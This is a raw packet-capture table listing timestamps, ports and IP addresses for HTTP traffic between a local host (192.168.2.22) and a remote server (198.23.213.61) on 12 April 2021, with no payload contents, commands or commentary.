Apr 12, 2021 11:34:50.895080090 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.895088911 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.895111084 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.895138025 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.895157099 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.895179987 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.895200968 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.895219088 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.895237923 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.895257950 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.895281076 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.895297050 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.895328045 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.895333052 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.895348072 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.895373106 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.895394087 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.895410061 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.895447016 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.895457983 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.895462990 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.895499945 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.895519972 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.895539045 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.895574093 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.895579100 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.895592928 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.895617962 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.895652056 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.895654917 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.895668983 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.895694017 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.895729065 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.895731926 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.895747900 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.895780087 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.895796061 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.895823002 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.895845890 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.895860910 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.895875931 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.895900965 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.895937920 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.895945072 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.895975113 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.895984888 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.896008015 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.896017075 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.896050930 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.896055937 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.896090984 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.896102905 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.896106005 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.896146059 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.896167994 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.896184921 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.896214962 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.896223068 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.896254063 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.896261930 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.896286011 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.896298885 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.896337032 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.896373034 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.896373987 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.896380901 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.896406889 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.896420956 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.896435976 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.896461964 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.896495104 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.896498919 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.896533966 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.896538973 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.896573067 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.896595955 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.896624088 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.896653891 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.896693945 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.896703005 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.896711111 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.896716118 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.896730900 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.896766901 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.896768093 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.896775961 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.896811008 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.896816969 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.896845102 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.896858931 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.896877050 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.896895885 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.896930933 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.896933079 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.896965981 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.896970034 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.896998882 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.897006035 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.897031069 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.897042990 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.897070885 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.897078991 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.897104979 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.897125959 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.897140980 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.897169113 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.897193909 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.897229910 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.019160032 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.019221067 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.019260883 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.019431114 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.019488096 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.019515991 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.036062956 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.036098957 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.036115885 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.036130905 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.036148071 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.036164045 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.036179066 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.036194086 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.036218882 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.036241055 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.036292076 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.036370993 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.036395073 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.036417961 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.036417007 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.036438942 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.036452055 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.036458015 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.036461115 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.036462069 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.036468029 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.036472082 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.036475897 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.036482096 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.036487103 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.036487103 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.036493063 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.036497116 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.036510944 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.036515951 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.036520958 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.036525011 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.036529064 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.036530018 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.036549091 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.036570072 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.036581993 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.036591053 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.036591053 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.036596060 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.036612034 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.036623955 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.036633968 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.036658049 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.036672115 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.036684990 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.036689997 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.036748886 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.036756992 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.036767960 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.040683985 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.040771961 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.156541109 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.156603098 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.156651974 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.156694889 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.156732082 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.156769037 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.156809092 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.156825066 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.156847954 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.156858921 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.156864882 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.156868935 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.156873941 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.156877995 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.156882048 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.156888008 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.156903028 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.156925917 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.156971931 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.156972885 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.156991959 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.157016039 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.157037020 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.157054901 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.157089949 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.157093048 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.157107115 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.157131910 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.157141924 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.157170057 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.157200098 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.157207012 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.157223940 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.157246113 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.157267094 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.157294989 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.157310963 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.157336950 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.157352924 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.157377005 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.157401085 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.157442093 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.157458067 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.157500982 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.157522917 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.157530069 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.157566071 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.157567978 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.157607079 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.157643080 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.157680035 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.157717943 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.157763958 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.157782078 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.157807112 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.157845020 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.157875061 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.157881975 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.157886982 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.157892942 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.157896996 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.157912016 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.157917023 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.157919884 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.157957077 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.157957077 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.157968998 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.157987118 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.157996893 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.157996893 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.158035040 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.158037901 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.158071995 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.158071995 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.158090115 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.158111095 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.158145905 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.158148050 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.158162117 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.158186913 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.158207893 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.158226013 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.158255100 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.158272982 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.158288002 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.158314943 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.158332109 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.158353090 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.158370018 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.158392906 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.158406973 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.158432007 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.158447981 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.158468008 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.158483982 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.158508062 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.158521891 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.158546925 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.158565998 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.158596992 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.158612967 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.158648968 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.158651114 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.158685923 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.158701897 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.158725023 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.158739090 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.158762932 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.158780098 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.158801079 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.158821106 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.158838987 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.158855915 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.158876896 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.158924103 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.158927917 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.158970118 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.158977032 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.159585953 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.159647942 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.160043001 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.172545910 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.172604084 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.172638893 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.172688007 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.172713995 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.172724009 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.172749043 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.172755003 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.172759056 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.172760010 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.172764063 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.172806978 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.301728010 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.301755905 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.301768064 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.301784992 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.301800966 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.301819086 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.301831961 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.301836967 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.301852942 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.301865101 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.301868916 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.301878929 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.301884890 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.301884890 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.301887035 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.301888943 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.301929951 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.301939011 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.301939011 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.301942110 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.301954985 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.301981926 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.301989079 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.301997900 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.302014112 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.302030087 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.302057981 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.302059889 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.302077055 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.302095890 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.302103996 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.302136898 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:51.303417921 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:51.303478003 CEST	49165	80	192.168.2.22	198.23.213.61
